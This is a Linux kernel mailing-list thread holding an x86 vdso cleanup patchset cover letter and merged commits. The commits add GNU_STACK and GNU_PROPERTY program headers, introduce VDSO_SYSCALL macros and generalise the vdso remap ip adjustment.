Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 8717b02b8c030dc0c4b55781b59e88def0a1a92f
Gitweb: https://git.kernel.org/tip/8717b02b8c030dc0c4b55781b59e88def0a1a92f
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:01 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso: Include GNU_PROPERTY and GNU_STACK PHDRs
Currently the vdso doesn't include .note.gnu.property or a GNU noexec
stack annotation (the -z noexecstack in the linker script is
ineffective because we specify PHDRs explicitly.)
The motivation is that the dynamic linker currently do not check
these.
However, this is a weak excuse: the vdso*.so are also supposed to be
usable at link libraries, and there is no reason why the dynamic
linker might not want or need to check these in the future, so add
them back in -- it is trivial enough.
Use symbolic constants for the PHDR permission flags.
[ v4: drop unrelated formatting changes ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-8-hpa@zytor.com
---
arch/x86/entry/vdso/common/vdso-layout.lds.S | 38 +++++++++++--------
1 file changed, 23 insertions(+), 15 deletions(-)
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
index ec1ac19..a1e30be 100644
--- a/arch/x86/entry/vdso/common/vdso-layout.lds.S
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -47,18 +47,18 @@ SECTIONS
*(.gnu.linkonce.b.*)
} :text
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
+ .note.gnu.property : {
*(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
+ } :text :note :gnu_property
+ .note : {
+ *(.note*)
+ } :text :note
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : {
+ KEEP (*(.eh_frame))
+ *(.eh_frame.*)
+ } :text
/*
* Text is well-separated from actual data: there's plenty of
@@ -87,15 +87,23 @@ SECTIONS
* Very old versions of ld do not recognize this name token; use the constant.
*/
#define PT_GNU_EH_FRAME 0x6474e550
+#define PT_GNU_STACK 0x6474e551
+#define PT_GNU_PROPERTY 0x6474e553
/*
* We must supply the ELF program headers explicitly to get just one
* PT_LOAD segment, and set the flags explicitly to make segments read-only.
- */
+*/
+#define PF_R FLAGS(4)
+#define PF_RW FLAGS(6)
+#define PF_RX FLAGS(5)
+
PHDRS
{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
+ text PT_LOAD PF_RX FILEHDR PHDRS;
+ dynamic PT_DYNAMIC PF_R;
+ note PT_NOTE PF_R;
+ eh_frame_hdr PT_GNU_EH_FRAME PF_R;
+ gnu_stack PT_GNU_STACK PF_RW;
+ gnu_property PT_GNU_PROPERTY PF_R;
}
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:52 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: a0636d4c3ad0da0cd6069eb6fef5d2b7d3449378
Gitweb: https://git.kernel.org/tip/a0636d4c3ad0da0cd6069eb6fef5d2b7d3449378
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:02 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/vdso: Abstract out vdso system call internals
Abstract out the calling of true system calls from the vdso into
macros.
It has been a very long time since gcc did not allow %ebx or %ebp in
inline asm in 32-bit PIC mode; remove the corresponding hacks.
Remove the use of memory output constraints in gettimeofday.h in favor
of "memory" clobbers. The resulting code is identical for the current
use cases, as the system call is usually a terminal fallback anyway,
and it merely complicates the macroization.
This patch adds only a handful of more lines of code than it removes,
and in fact could be made substantially smaller by removing the macros
for the argument counts that aren't currently used, however, it seems
better to be general from the start.
[ v3: remove stray comment from prototyping; remove VDSO_SYSCALL6()
since it would require special handling on 32 bits and is
currently unused. (Uros Biszjak)
Indent nested preprocessor directives. ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Acked-by: Uros Bizjak <ubizjak@gmail.com>
Link: https://patch.msgid.link/20251216212606.1325678-9-hpa@zytor.com
---
arch/x86/include/asm/vdso/gettimeofday.h | 108 +---------------------
arch/x86/include/asm/vdso/sys_call.h | 103 +++++++++++++++++++++-
2 files changed, 111 insertions(+), 100 deletions(-)
create mode 100644 arch/x86/include/asm/vdso/sys_call.h
diff --git a/arch/x86/include/asm/vdso/gettimeofday.h b/arch/x86/include/asm/vdso/gettimeofday.h
index 73b2e7e..3cf214c 100644
--- a/arch/x86/include/asm/vdso/gettimeofday.h
+++ b/arch/x86/include/asm/vdso/gettimeofday.h
@@ -18,6 +18,7 @@
#include <asm/msr.h>
#include <asm/pvclock.h>
#include <clocksource/hyperv_timer.h>
+#include <asm/vdso/sys_call.h>
#define VDSO_HAS_TIME 1
@@ -53,130 +54,37 @@ extern struct ms_hyperv_tsc_page hvclock_page
__attribute__((visibility("hidden")));
#endif
-#ifndef BUILD_VDSO32
-
static __always_inline
long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_gettime), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,64,_clkid,_ts);
}
static __always_inline
long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
struct timezone *_tz)
{
- long ret;
-
- asm("syscall" : "=a" (ret) :
- "0" (__NR_gettimeofday), "D" (_tv), "S" (_tz) : "memory");
-
- return ret;
+ return VDSO_SYSCALL2(gettimeofday,,_tv,_tz);
}
static __always_inline
long clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_getres), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,_time64,_clkid,_ts);
}
-#else
-
-static __always_inline
-long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
+#ifndef CONFIG_X86_64
static __always_inline
long clock_gettime32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
- struct timezone *_tz)
-{
- long ret;
-
- asm(
- "mov %%ebx, %%edx \n"
- "mov %2, %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret)
- : "0" (__NR_gettimeofday), "g" (_tv), "c" (_tz)
- : "memory", "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,,_clkid,_ts);
}
static __always_inline long
-clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres_time64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
+clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,,_clkid,_ts);
}
#endif
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
new file mode 100644
index 0000000..dcfd17c
--- /dev/null
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -0,0 +1,103 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Macros for issuing an inline system call from the vDSO.
+ */
+
+#ifndef X86_ASM_VDSO_SYS_CALL_H
+#define X86_ASM_VDSO_SYS_CALL_H
+
+#include <linux/compiler.h>
+#include <asm/cpufeatures.h>
+#include <asm/alternative.h>
+
+#ifdef CONFIG_X86_64
+# define __sys_instr "syscall"
+# define __sys_clobber "rcx", "r11", "memory"
+# define __sys_nr(x,y) __NR_ ## x
+# define __sys_reg1 "rdi"
+# define __sys_reg2 "rsi"
+# define __sys_reg3 "rdx"
+# define __sys_reg4 "r10"
+# define __sys_reg5 "r8"
+#else
+# define __sys_instr "call __kernel_vsyscall"
+# define __sys_clobber "memory"
+# define __sys_nr(x,y) __NR_ ## x ## y
+# define __sys_reg1 "ebx"
+# define __sys_reg2 "ecx"
+# define __sys_reg3 "edx"
+# define __sys_reg4 "esi"
+# define __sys_reg5 "edi"
+#endif
+
+/*
+ * Example usage:
+ *
+ * result = VDSO_SYSCALL3(foo,64,x,y,z);
+ *
+ * ... calls foo(x,y,z) on 64 bits, and foo64(x,y,z) on 32 bits.
+ *
+ * VDSO_SYSCALL6() is currently missing, because it would require
+ * special handling for %ebp on 32 bits when the vdso is compiled with
+ * frame pointers enabled (the default on 32 bits.) Add it as a special
+ * case when and if it becomes necessary.
+ */
+#define _VDSO_SYSCALL(name,suf32,...) \
+ ({ \
+ long _sys_num_ret = __sys_nr(name,suf32); \
+ asm_inline volatile( \
+ __sys_instr \
+ : "+a" (_sys_num_ret) \
+ : __VA_ARGS__ \
+ : __sys_clobber); \
+ _sys_num_ret; \
+ })
+
+#define VDSO_SYSCALL0(name,suf32) \
+ _VDSO_SYSCALL(name,suf32)
+#define VDSO_SYSCALL1(name,suf32,a1) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1)); \
+ })
+#define VDSO_SYSCALL2(name,suf32,a1,a2) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2)); \
+ })
+#define VDSO_SYSCALL3(name,suf32,a1,a2,a3) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3)); \
+ })
+#define VDSO_SYSCALL4(name,suf32,a1,a2,a3,a4) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4)); \
+ })
+#define VDSO_SYSCALL5(name,suf32,a1,a2,a3,a4,a5) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ register long _sys_arg5 asm(__sys_reg5) = (long)(a5); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4), \
+ "r" (_sys_arg5)); \
+ })
+
+#endif /* X86_VDSO_SYS_CALL_H */
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:51 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 6e150b71019f386a021004fafea9ef7189bc6aea
Gitweb: https://git.kernel.org/tip/6e150b71019f386a021004fafea9ef7189bc6aea
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:58 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: Don't rely on int80_landing_pad for adjusting ip
There is no fundamental reason to use the int80_landing_pad symbol to
adjust ip when moving the vdso. If ip falls within the vdso, and the
vdso is moved, we should change the ip accordingly, regardless of mode
or location within the vdso. This *currently* can only happen on 32
bits, but there isn't any reason not to do so generically.
Note that if this is ever possible from a vdso-internal call, then the
user space stack will also needed to be adjusted (as well as the
shadow stack, if enabled.) Fortunately this is not currently the case.
At the moment, we don't even consider other threads when moving the
vdso. The assumption is that it is only used by process freeze/thaw
for migration, where this is not an issue.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-5-hpa@zytor.com
---
arch/x86/entry/vdso/vma.c | 16 ++++++----------
1 file changed, 6 insertions(+), 10 deletions(-)
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index 8f98c2d..e7fd751 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,16 +65,12 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso32_image) {
- struct pt_regs *regs = current_pt_regs();
- unsigned long vdso_land = image->sym_int80_landing_pad;
- unsigned long old_land_addr = vdso_land +
- (unsigned long)current->mm->context.vdso;
-
- /* Fixing userspace landing - look at do_fast_syscall_32 */
- if (regs->ip == old_land_addr)
- regs->ip = new_vma->vm_start + vdso_land;
- }
+ struct pt_regs *regs = current_pt_regs();
+ unsigned long ipoffset = regs->ip -
+ (unsigned long)current->mm->context.vdso;
+
+ if (ipoffset < image->size)
+ regs->ip = new_vma->vm_start + ipoffset;
}
static int vdso_mremap(const struct vm_special_mapping *sm,
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:55 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
